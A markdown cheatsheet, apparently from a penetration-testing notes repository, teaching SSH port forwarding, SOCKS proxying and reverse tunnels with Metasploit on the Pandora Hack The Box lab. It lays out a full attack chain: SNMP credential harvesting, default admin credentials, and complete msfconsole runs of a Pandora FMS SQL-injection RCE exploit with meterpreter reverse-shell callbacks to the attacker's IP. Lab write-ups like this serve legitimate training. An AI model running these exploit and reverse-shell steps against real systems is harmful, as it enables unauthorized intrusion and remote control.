daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

ssh-portfwding-with-metasploit.md (11845B)


      1 ---
      2 title: "SSH Portfwding with metasploit"
      3 description: "Your original guide is mostly correct for local port forwarding (ssh -L), but it lacks clarity on why things work and when to use different approaches…"
      4 category: tunneling-pivoting
      5 tags: ["tunneling-pivoting", "tunneling"]
      6 tools: ["Metasploit", "Meterpreter"]
      7 difficulty: intermediate
      8 updated: "2026-08-10"
      9 source: "vault:Misc/SSH Portfwding with metasploit .md"
     10 ---
     11 # SSH Tunneling with Metasploit: A Complete Guide (Pandora HTB Edition)
     12 
     13 Your original guide is **mostly correct** for local port forwarding (`ssh -L`), but it lacks clarity on *why* things work and when to use different approaches. Let me clarify the confusion and expand with the Pandora HTB box as a practical example.
     14 
     15 ---
     16 
     17 ## Understanding the Pandora HTB Scenario
     18 
     19 **The Problem:**
     20 * Pandora HTB has a **Pandora FMS web application** running on `127.0.0.1:80` (localhost only)
     21 * It's bound ONLY to loopback—you **cannot** access it from your attacker machine directly
     22 * You gain SSH access as `daniel` user via SNMP credential leak
     23 * You need to access this internal web service to exploit it
     24 
     25 **The Solution:** SSH local port forwarding
     26 
     27 ---
     28 
     29 ## Part 1: SSH Local Port Forward (`ssh -L`) - The Pandora Way
     30 
     31 ### What It Actually Does
     32 
     33 ```bash
     34 ssh -L 9001:localhost:80 daniel@10.10.11.136
     35 ```
     36 
     37 **This creates a PORT MAPPING:**
     38 * Your machine listens on `127.0.0.1:9001`
     39 * Any connection to YOUR `127.0.0.1:9001` → tunneled through SSH → TARGET's `localhost:80`
     40 
     41 **Critical Understanding:**
     42 * The `localhost:80` part is resolved **from the target's perspective**
     43 * You could also forward to OTHER machines the target can reach: `ssh -L 9001:10.10.10.5:80 daniel@target`
     44 
     45 ### Verify the Tunnel
     46 
     47 From **your machine**:
     48 
     49 ```bash
     50 curl -i http://127.0.0.1:9001/pandora_console/
     51 # Or in browser: http://127.0.0.1:9001/pandora_console/
     52 ```
     53 
     54 If you see the Pandora FMS login page, the tunnel works.
     55 
     56 ---
     57 
     58 ## Part 2: Metasploit Configuration with `ssh -L`
     59 
     60 ### Core Principle: You're Targeting YOUR Local Endpoint
     61 
     62 When using `ssh -L`, Metasploit connects to **your local tunnel endpoint**, NOT the remote IP.
     63 
     64 ### Configuration for Pandora FMS Exploit
     65 
     66 ```bash
     67 msfconsole
     68 use exploit/linux/http/pandora_fms_sqli_rce
     69 show options
     70 ```
     71 
     72 **Set these options:**
     73 
     74 | Option | Value | Why |
     75 |--------|-------|-----|
     76 | `RHOSTS` | `127.0.0.1` | The tunnel endpoint is on YOUR localhost |
     77 | `RPORT` | `9001` | YOUR local listening port (not 80!) |
     78 | `SSL` | `false` | Port 80 is HTTP, not HTTPS |
     79 | `TARGETURI` | `/pandora_console/` | Application base path |
     80 | `USERNAME` | `admin` | Default or discovered credentials |
     81 | `PASSWORD` | `pandora` | Default or discovered credentials |
     82 | `Proxies` | **UNSET** | `ssh -L` is NOT a proxy |
     83 
     84 **Commands:**
     85 
     86 ```bash
     87 set RHOSTS 127.0.0.1
     88 set RPORT 9001
     89 set SSL false
     90 set TARGETURI /pandora_console/
     91 set USERNAME admin
     92 set PASSWORD pandora
     93 unset Proxies
     94 ```
     95 
     96 ---
     97 
     98 ## Part 3: The Critical LHOST Confusion (Reverse Shells)
     99 
    100 ### The Two Separate Connections
    101 
    102 When you exploit a service, there are **TWO different network connections**:
    103 
    104 1. **Exploit Delivery** (Metasploit → Web Service):
    105    * Goes through the tunnel
    106    * RHOSTS=127.0.0.1, RPORT=9001
    107 
    108 2. **Reverse Shell** (Target → Attacker):
    109    * Does NOT go through the tunnel (usually)
    110    * LHOST=your_real_IP (e.g., tun0 10.10.14.x)
    111 
    112 ### LHOST Settings for Pandora HTB
    113 
    114 ```bash
    115 set LHOST 10.10.14.50  # Your tun0 VPN IP
    116 set LPORT 4444         # Port where YOU listen for callback
    117 ```
    118 
    119 **Why NOT `127.0.0.1`?**
    120 * If LHOST=127.0.0.1, you're telling the target to connect to **its own** localhost
    121 * The reverse shell would try to connect to itself and fail
    122 
    123 **Why does this work without another tunnel?**
    124 * The target **can reach** your VPN IP directly (10.10.14.x)
    125 * Only the *web service* is localhost-only
    126 * The target machine itself has normal network connectivity
    127 
    128 ### Complete Exploit Command
    129 
    130 ```bash
    131 use exploit/linux/http/pandora_fms_sqli_rce
    132 set RHOSTS 127.0.0.1    # Tunnel endpoint on YOUR machine
    133 set RPORT 9001          # YOUR local port
    134 set SSL false
    135 set TARGETURI /pandora_console/
    136 set USERNAME admin
    137 set PASSWORD pandora
    138 set LHOST 10.10.14.50   # YOUR tun0 IP (for reverse shell)
    139 set LPORT 4444
    140 set PAYLOAD linux/x64/meterpreter/reverse_tcp
    141 exploit
    142 ```
    143 
    144 ---
    145 
    146 ## Part 4: When to Use `ssh -D` (Dynamic SOCKS Proxy)
    147 
    148 ### The Difference
    149 
    150 `ssh -D` is **completely different** from `ssh -L`:
    151 
    152 | Feature | `ssh -L` (Local Forward) | `ssh -D` (SOCKS Proxy) |
    153 |---------|-------------------------|------------------------|
    154 | Type | Direct port mapping | Application-level proxy |
    155 | Targets | ONE specific host:port | ANY host:port through proxy |
    156 | Setup | One tunnel per port | One proxy for everything |
    157 | Metasploit Config | RHOSTS=127.0.0.1, no Proxies | RHOSTS=actual_target, set Proxies |
    158 
    159 ### Creating a SOCKS Proxy
    160 
    161 ```bash
    162 ssh -D 1080 daniel@10.10.11.136
    163 ```
    164 
    165 This creates a **SOCKS5 proxy** on YOUR `127.0.0.1:1080`.
    166 
    167 ### Metasploit Configuration with SOCKS Proxy
    168 
    169 **Key difference:** You now target the **actual remote host**, not 127.0.0.1:
    170 
    171 ```bash
    172 setg Proxies socks5:127.0.0.1:1080
    173 set RHOSTS 10.10.11.136    # Actual target IP
    174 set RPORT 80               # Actual remote port
    175 set SSL false
    176 ```
    177 
    178 **What happens:**
    179 1. Metasploit connects to the SOCKS proxy at 127.0.0.1:1080
    180 2. Proxy forwards the connection through SSH to 10.10.11.136:80
    181 3. The target's localhost services are still unreachable (SOCKS doesn't help here)
    182 
    183 ### When to Use SOCKS (`ssh -D`)
    184 
    185 * **Multiple targets/ports** behind the SSH server
    186 * Scanning entire internal networks
    187 * Dynamic reconnaissance
    188 * When you don't know which ports you'll need in advance
    189 
    190 For Pandora HTB specifically, **`ssh -L` is simpler** because you only need one specific port.
    191 
    192 ---
    193 
    194 ## Part 5: Advanced Scenario - `ssh -R` (Reverse Tunnel)
    195 
    196 ### When Target Cannot Reach You
    197 
    198 Sometimes the target **cannot** connect back to your IP:
    199 * Double NAT
    200 * Firewall blocking outbound
    201 * No route to your network
    202 
    203 **Solution:** Reverse port forward
    204 
    205 ### How `ssh -R` Works
    206 
    207 ```bash
    208 # On your machine, create reverse tunnel:
    209 ssh -R 4444:localhost:4444 daniel@10.10.11.136
    210 
    211 # In another terminal, start local listener:
    212 nc -lvnp 4444
    213 ```
    214 
    215 **What this does:**
    216 * Target's `localhost:4444` → tunneled back through SSH → YOUR `localhost:4444`
    217 * When target connects to its own localhost:4444, it reaches your listener
    218 
    219 ### Metasploit with Reverse Tunnel
    220 
    221 ```bash
    222 # Terminal 1: Start handler on your machine
    223 msfconsole
    224 use multi/handler
    225 set PAYLOAD linux/x64/shell/reverse_tcp
    226 set LHOST 127.0.0.1     # Listen locally
    227 set LPORT 4444
    228 run
    229 
    230 # Terminal 2: Create reverse tunnel and exploit
    231 ssh -R 4444:localhost:4444 daniel@10.10.11.136
    232 
    233 # Terminal 3: Run exploit with tunnel settings
    234 msfconsole
    235 use exploit/linux/http/pandora_fms_sqli_rce
    236 set RHOSTS 127.0.0.1   # Web service tunnel
    237 set RPORT 9001
    238 set LHOST 127.0.0.1    # Target connects to its localhost
    239 set LPORT 4444         # Which forwards to you via ssh -R
    240 set PAYLOAD linux/x64/shell/reverse_tcp
    241 exploit
    242 ```
    243 
    244 ---
    245 
    246 ## Part 6: Complete Pandora HTB Workflow
    247 
    248 ### Step 1: Reconnaissance
    249 
    250 ```bash
    251 # Enumerate SNMP (finds daniel's credentials)
    252 snmpwalk -v 2c -c public 10.10.11.136
    253 ```
    254 
    255 ### Step 2: SSH Access
    256 
    257 ```bash
    258 ssh daniel@10.10.11.136
    259 # Password discovered via SNMP
    260 ```
    261 
    262 ### Step 3: Port Forward (keep this running)
    263 
    264 ```bash
    265 ssh -L 9001:localhost:80 daniel@10.10.11.136 -N
    266 # -N means "don't execute commands, just forward"
    267 ```
    268 
    269 ### Step 4: Verify Access
    270 
    271 ```bash
    272 curl http://127.0.0.1:9001/pandora_console/
    273 ```
    274 
    275 ### Step 5: Exploit with Metasploit
    276 
    277 ```bash
    278 msfconsole -q
    279 use exploit/linux/http/pandora_fms_sqli_rce
    280 
    281 # Access the web service via tunnel
    282 set RHOSTS 127.0.0.1
    283 set RPORT 9001
    284 set SSL false
    285 set TARGETURI /pandora_console/
    286 
    287 # Credentials (default or discovered)
    288 set USERNAME admin
    289 set PASSWORD pandora
    290 
    291 # Reverse shell comes back directly (not through tunnel)
    292 set LHOST 10.10.14.50    # Your tun0 IP
    293 set LPORT 4444
    294 
    295 # Payload
    296 set PAYLOAD linux/x64/meterpreter/reverse_tcp
    297 
    298 # No proxy needed for ssh -L
    299 unset Proxies
    300 
    301 show options
    302 check
    303 exploit
    304 ```
    305 
    306 ---
    307 
    308 ## Part 7: Common Mistakes & Fixes
    309 
    310 ### ❌ Mistake 1: Setting RHOSTS to Target IP
    311 
    312 ```bash
    313 set RHOSTS 10.10.11.136  # WRONG with ssh -L
    314 set RPORT 80
    315 ```
    316 
    317 **Why it fails:** You're bypassing the tunnel and trying to connect directly (which is blocked).
    318 
    319 **Fix:**
    320 ```bash
    321 set RHOSTS 127.0.0.1   # Your local tunnel endpoint
    322 set RPORT 9001         # Your local port
    323 ```
    324 
    325 ---
    326 
    327 ### ❌ Mistake 2: Setting LHOST to 127.0.0.1
    328 
    329 ```bash
    330 set LHOST 127.0.0.1    # WRONG for standard reverse shell
    331 ```
    332 
    333 **Why it fails:** Target tries to connect to its own localhost, not you.
    334 
    335 **Fix:**
    336 ```bash
    337 set LHOST 10.10.14.50  # Your tun0 IP that target can reach
    338 ```
    339 
    340 ---
    341 
    342 ### ❌ Mistake 3: Using Proxies with `ssh -L`
    343 
    344 ```bash
    345 set Proxies socks5:127.0.0.1:1080  # WRONG with ssh -L
    346 ```
    347 
    348 **Why it's wrong:** `ssh -L` is not a proxy, it's a direct port mapping.
    349 
    350 **Fix:**
    351 ```bash
    352 unset Proxies
    353 unsetg Proxies
    354 ```
    355 
    356 ---
    357 
    358 ### ❌ Mistake 4: Wrong SSL Setting
    359 
    360 ```bash
    361 set SSL true  # WRONG when forwarding HTTP port 80
    362 ```
    363 
    364 **Why it fails:** Metasploit tries HTTPS but port 80 speaks HTTP.
    365 
    366 **Fix:**
    367 ```bash
    368 set SSL false  # Match the actual protocol
    369 ```
    370 
    371 ---
    372 
    373 ## Part 8: Decision Tree
    374 
    375 ### Which Tunneling Method?
    376 
    377 ```
    378 Need to access localhost-only service?
    379 │
    380 ├─ YES: Need ONE specific port?
    381 │   └─ Use: ssh -L 9001:localhost:80 user@target
    382 │   └─ Metasploit: RHOSTS=127.0.0.1, RPORT=9001, unset Proxies
    383 │
    384 ├─ YES: Need MULTIPLE ports/hosts?
    385 │   └─ Use: ssh -D 1080 user@target
    386 │   └─ Metasploit: setg Proxies socks5:127.0.0.1:1080, RHOSTS=actual_IP
    387 │
    388 └─ NO: Direct access works
    389     └─ Just set RHOSTS=target_IP normally
    390 ```
    391 
    392 ### Can Target Reach You for Reverse Shell?
    393 
    394 ```
    395 Target can connect to your IP?
    396 │
    397 ├─ YES (normal case):
    398 │   └─ LHOST=your_tun0_IP (e.g., 10.10.14.50)
    399 │
    400 ├─ NO (firewall/NAT blocks):
    401 │   └─ Use: ssh -R 4444:localhost:4444 user@target
    402 │   └─ LHOST=127.0.0.1 (target's localhost forwards to you)
    403 │
    404 └─ UNSURE:
    405     └─ Try: python3 -m http.server 8000
    406     └─ On target: curl http://your_IP:8000
    407     └─ If works: use your_IP, if fails: use ssh -R
    408 ```
    409 
    410 ---
    411 
    412 ## Part 9: Auxiliary/Scanner Modules (No LHOST Needed)
    413 
    414 For modules that just **query** the service (no reverse shell):
    415 
    416 ```bash
    417 use auxiliary/scanner/http/http_version
    418 set RHOSTS 127.0.0.1
    419 set RPORT 9001
    420 set SSL false
    421 unset Proxies
    422 run
    423 ```
    424 
    425 **Notice:** No LHOST/LPORT because there's no reverse connection.
    426 
    427 ---
    428 
    429 ## Summary Table: Metasploit Settings by Tunnel Type
    430 
    431 | Tunnel Type | RHOSTS | RPORT | Proxies | LHOST (if reverse shell) |
    432 |-------------|--------|-------|---------|--------------------------|
    433 | `ssh -L 9001:localhost:80` | `127.0.0.1` | `9001` | **unset** | Your real IP (10.10.14.x) |
    434 | `ssh -D 1080` | Actual target IP | Actual port | `socks5:127.0.0.1:1080` | Your real IP (10.10.14.x) |
    435 | `ssh -R 4444:localhost:4444` | `127.0.0.1` (for web) | `9001` (for web) | **unset** | `127.0.0.1` (target's localhost) |
    436 | No tunnel | Actual target IP | Actual port | **unset** | Your real IP (10.10.14.x) |
    437 
    438 ---
    439 
    440 ## What Your Original Guide Got Right
    441 
    442 * ✅ RHOSTS=127.0.0.1 for `ssh -L`
    443 * ✅ RPORT=local_listening_port for `ssh -L`
    444 * ✅ Unset Proxies for `ssh -L`
    445 * ✅ LHOST/LPORT mostly not needed for scanner modules
    446 
    447 ## What It Missed
    448 
    449 * ❌ **WHY** RHOSTS is 127.0.0.1 (it's YOUR local endpoint)
    450 * ❌ LHOST for reverse shells (needs your real IP)
    451 * ❌ When to use `ssh -D` vs `ssh -L`
    452 * ❌ `ssh -R` for when target can't reach you
    453 * ❌ The distinction between "accessing service" and "receiving reverse shell"
    454 
    455 ---
    456 
    457 This guide should clear up the confusion. The Pandora HTB example is perfect for understanding these concepts because it demonstrates the exact scenario where `ssh -L` shines.